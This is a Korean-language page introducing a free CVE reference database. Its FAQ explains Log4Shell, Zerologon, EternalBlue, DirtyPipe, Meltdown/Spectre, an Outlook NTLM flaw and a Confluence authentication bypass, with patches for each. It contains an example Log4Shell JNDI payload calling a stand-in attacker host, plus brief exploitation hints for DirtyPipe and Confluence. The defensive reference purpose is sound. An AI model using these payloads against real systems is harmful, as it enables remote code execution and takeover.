CVE Database Guide
CVE 취약점 데이터베이스 가이드
CVE Database Guide 소개
CVE 취약점 레퍼런스는 25개 이상의 주요 CVE(Common Vulnerabilities and Exposures)를 6개 카테고리로 정리한 무료 온라인 보안 도구입니다. 웹 취약점(Log4Shell CVE-2021-44228, ProxyShell CVE-2021-34473, MOVEit CVE-2023-34362, PAN-OS CVE-2024-3400), 네트워크 취약점(Zerologon CVE-2020-1472, EternalBlue CVE-2017-0144, Heartbleed CVE-2014-0160, FortiGate CVE-2023-27997), 운영체제 취약점(DirtyPipe CVE-2022-0847, PwnKit CVE-2021-4034, DirtyCow CVE-2016-5195, PrintNightmare CVE-2021-1675), 애플리케이션, 서비스, 하드웨어 취약점(Meltdown, Spectre)을 포함합니다.
이 레퍼런스는 고영향 취약점에 대한 정보에 빠르게 접근해야 하는 보안 전문가, 침투 테스터, SOC 분석가, 시스템 관리자, 컴플라이언스 담당자를 위해 설계되었습니다. 각 CVE 항목에는 CVE 식별자와 일반명, 취약점 메커니즘 설명, CVSS 심각도 점수, 영향 받는 소프트웨어 버전, 공격 벡터 또는 익스플로잇 예시, 특정 패치 및 설정 변경을 포함한 대응 방법이 수록되어 있습니다.
모든 취약점 데이터는 클라이언트 측에서 로드되며, CVE 번호(예: CVE-2021-44228), 일반명(예: Log4Shell), 키워드로 즉시 검색할 수 있습니다. 6개 카테고리(웹, 네트워크, 운영체제, 애플리케이션, 서비스, 하드웨어)로 필터링이 가능합니다. 한국어와 영어를 모두 지원하며, 로그인이나 설치 없이 페이지 로드 후 오프라인으로 전체 데이터베이스를 사용할 수 있습니다.
주요 기능
- 25개 이상 주요 CVE — CVSS 점수, 익스플로잇 상세, 영향 버전, 대응 방법 수록
- 6개 카테고리 분류: 웹, 네트워크, 운영체제, 애플리케이션, 서비스, 하드웨어
- 웹 CVE: Log4Shell(CVSS 10.0), ProxyShell, MOVEit SQL 인젝션, PAN-OS 명령 인젝션
- 네트워크 CVE: Zerologon(CVSS 10.0), EternalBlue, Heartbleed, FortiGate SSL-VPN 힙 오버플로우
- 운영체제 CVE: DirtyPipe, PwnKit, DirtyCow, PrintNightmare — 익스플로잇 예시 및 패치 참조
- 하드웨어 CVE: Meltdown, Spectre v1, Spectre v4, Spectre-BHB — 마이크로코드 및 커널 대응
- CVE 번호, 일반명(Log4Shell, Zerologon), 키워드로 즉시 검색
- 한국어/영어 이중 언어, 오프라인 사용 가능한 모바일 반응형 설계
자주 묻는 질문
CVE-2021-44228(Log4Shell)이란 무엇인가요?
Log4Shell은 Apache Log4j2 버전 2.0-beta9부터 2.14.1까지에 존재하는 치명적 원격 코드 실행 취약점(CVSS 10.0)입니다. 공격자는 사용자 입력을 Log4j2로 로깅하는 모든 애플리케이션에 조작된 JNDI 조회 문자열(예: ${jndi:ldap://attacker.com/exploit})을 전송하여 임의 코드를 실행할 수 있습니다. JNDI(Java Naming and Directory Interface) 기능을 통해 악용됩니다. Log4j 2.17.0 이상으로 업데이트해야 합니다.
CVE-2020-1472(Zerologon)란 무엇인가요?
Zerologon(CVSS 10.0)은 Windows Netlogon 원격 프로토콜(MS-NRPC)의 치명적 취약점으로, AES-CFB8 구현의 암호학적 결함으로 인해 공격자가 모든 값이 0인 챌린지 바이트를 사용하여 도메인 컨트롤러에 Netlogon 보안 채널 연결을 설정할 수 있습니다. 이를 통해 인증되지 않은 네트워크 위치에서 도메인 관리자 권한 상승이 가능합니다. 모든 Windows Server 버전이 영향을 받으며, KB4571702 패치를 적용해야 합니다.
Meltdown과 Spectre의 차이는 무엇인가요?
Meltdown(CVE-2017-5754)은 Intel CPU의 비순차적 실행(out-of-order execution) 결함을 이용하여 사용자 공간에서 커널 메모리를 읽는 취약점입니다. 주로 Intel CPU에 영향을 미치며 KPTI(커널 페이지 테이블 격리) 패치로 대응합니다. Spectre(v1은 CVE-2017-5753, v4는 CVE-2018-3639)는 분기 예측과 투기적 실행을 이용하여 프로세스 경계를 넘어 데이터를 유출합니다. Intel, AMD, ARM CPU 모두에 영향을 미치며 마이크로코드 업데이트와 컴파일러 패치가 필요합니다. Spectre는 일반적으로 악용이 어렵지만 완전한 대응도 더 어렵습니다.
CVE-2022-0847(DirtyPipe)란 무엇인가요?
DirtyPipe는 Linux 커널 5.8부터 5.16.10까지에 존재하는 권한 상승 취약점(CVSS 7.8)입니다. PIPE_BUF_FLAG_CAN_MERGE 플래그가 제대로 초기화되지 않는 파이프 서브시스템의 결함을 악용하여, 비특권 로컬 사용자가 SUID 바이너리를 포함한 읽기 전용 파일의 데이터를 덮어쓸 수 있습니다. /etc/passwd를 수정하여 root 접근이 가능합니다. 커널 5.16.11 이상으로 업데이트해야 합니다.
특정 CVE를 어떻게 검색하나요?
CVE 번호(예: CVE-2021-44228), 일반 취약점 이름(예: Log4Shell, Zerologon, EternalBlue, DirtyPipe), 영향 받는 소프트웨어 이름(예: Exchange, FortiOS, Confluence), 일반 키워드(예: RCE, SQL 인젝션, 권한 상승)로 검색할 수 있습니다. 카테고리 필터를 사용하면 웹, 네트워크, 운영체제, 애플리케이션, 서비스, 하드웨어 취약점으로 결과를 좁힐 수 있습니다.
CVE-2017-0144(EternalBlue)란 무엇인가요?
EternalBlue은 Windows XP부터 Server 2008 R2까지 영향을 미치는 Microsoft SMBv1(서버 메시지 블록 v1)의 원격 코드 실행 취약점입니다. 원래 NSA가 개발하고 Shadow Brokers 그룹이 유출했으며, 2017년 WannaCry 랜섬웨어에 악용되어 유명해졌습니다. 조작된 SMB 패킷을 전송하여 인증 없이 원격 코드를 실행할 수 있습니다. MS17-010 패치를 적용하고 SMBv1을 비활성화해야 합니다.
CVE-2023-23397(Outlook NTLM 릴레이)란?
CVE-2023-23397(CVSS 9.8)은 특수 조작된 캘린더 초대를 통해 NTLM 해시를 탈취할 수 있는 치명적 Microsoft Outlook 취약점입니다. 사용자 상호작용이 필요 없으며, 악성 이메일을 수신하는 것만으로 취약점이 발동됩니다. 피해자의 NTLM 인증 해시가 공격자 서버로 전송되어 릴레이 공격이나 오프라인 크래킹이 가능합니다. Outlook을 업데이트하고 네트워크 경계에서 아웃바운드 SMB 트래픽(포트 445)을 차단해야 합니다.
CVE-2023-22515(Confluence 인증 우회)란?
CVE-2023-22515(CVSS 10.0)은 Atlassian Confluence Data Center 및 Server의 치명적 인증 우회 취약점입니다. 공격자가 /setup/setupadministrator.action으로 조작된 POST 요청을 보내 인증 없이 관리자 계정을 생성할 수 있으며, 사실상 프로덕션 인스턴스에서 초기 설정 마법사를 재실행하는 것입니다. 실제 공격에 악용되었습니다. 즉시 패치를 적용하고 신뢰할 수 없는 네트워크에서 Confluence 인스턴스 접근을 제한해야 합니다.